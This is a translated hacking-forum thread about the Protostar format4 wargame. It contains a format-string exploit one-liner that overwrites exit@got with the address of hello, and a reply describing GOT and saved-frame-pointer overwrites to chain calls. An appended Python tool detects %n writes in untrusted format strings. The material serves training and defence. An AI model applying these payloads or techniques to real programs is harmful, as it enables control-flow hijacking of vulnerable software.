System Hacking

   tkakr7458
   format string bug + got overwrite

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1864


Hmm.. I can't upload a picture, so this is hard to explain ㅠㅠ

https://exploit-exercises.com/protostar/format4/

The address above is the source.

I am trying to overwrite exit with hello.

hello = 0x080484b4 and
exit@got = 0x8049718.

The format offset is 4. (With "AAAA %x%x%x%x" it shows up in the 4th position.)

(python -c 'print "\x18\x97\x04\x08"+"%134513840x"+"%4$n"')
                   exit@got           hello as an integer - 4

I understand that doing it this way performs the overwrite, but I don't know how to call hello repeatedly in succession. Please help ㅠㅠ

  Hit : 2377     Date : 2017/04/19 08:28



    
해쿨러 The intent of this problem itself is to call hello only once. hello contains _exit, so the program will terminate after going to hello anyway, but in a situation where it is not there, calling it repeatedly requires overwriting the stack.
Overwrite the GOT of the exit function with a function that proceeds normally even when it receives the argument 1, for example execve (execve does not terminate the program even if its arguments are wrong),
and then find the pointer to the sfp. That is, since vuln's sfp points to main's sfp, if you overwrite the address through vuln's sfp with %n and then lay the payload down with the fsb starting from main's ret, you can do call chaining with an fsb as well.
2017/04/20  
해쿨러 http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20  
tkakr7458 Thank you. ㅠㅠ 2017/04/20  
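
An added example, not part of the original thread: a small analyzer that finds `%n` directives in a format string and reports which argument each one writes through and how many bytes printf has emitted by then, the check a reviewer or input filter would run on untrusted format data. `find_n_writes` and `PAYLOAD` are hypothetical names; the sample is rebuilt from the addresses given in the question, with the padding written as a field width (`%134513840x`), and a 32-bit target is assumed.

```python
import re

# printf directive: %[argpos$][flags][width][.precision][length]conversion
DIRECTIVE = re.compile(
    rb"%(?:(\d+)\$)?[-+ #0]*(\d+)?(?:\.(\d+))?"
    rb"(hh|h|ll|l|j|z|t|L)?([diouxXeEfgGaAcspn%])"
)
# Bytes stored by %n for each length modifier (assumption: ILP32 target).
WRITE_BYTES = {b"hh": 1, b"h": 2, None: 4, b"l": 4, b"ll": 8}

# Constructed sample: the format string from the question, as bytes.
PAYLOAD = b"\x18\x97\x04\x08" + b"%134513840x" + b"%4$n"


def find_n_writes(fmt: bytes):
    """Return one dict per %n directive found in fmt.

    'count' is the minimum number of bytes emitted when the directive is
    reached; it is exact when every earlier conversion carries a width
    larger than its natural output, as in PAYLOAD.
    """
    findings, emitted, pos, next_arg = [], 0, 0, 1
    for m in DIRECTIVE.finditer(fmt):
        emitted += m.start() - pos       # literal bytes before this directive
        pos = m.end()
        argpos, width, _prec, length, conv = m.groups()
        if conv == b"%":                 # "%%" prints one literal percent sign
            emitted += 1
            continue
        arg = int(argpos) if argpos else next_arg
        if not argpos:
            next_arg += 1                # non-positional directives consume in order
        if conv == b"n":
            findings.append({"arg": arg, "count": emitted,
                             "size": WRITE_BYTES.get(length, 4)})
        else:
            natural = 0 if conv == b"s" else 1
            emitted += max(int(width or 0), natural)
    return findings


if __name__ == "__main__":
    for f in find_n_writes(PAYLOAD):
        print("%%n via arg %d stores %#010x (%d bytes)"
              % (f["arg"], f["count"], f["size"]))
```

Any non-empty result on data that reaches a printf-family format argument is a finding by itself; benign input has no reason to contain `%n`.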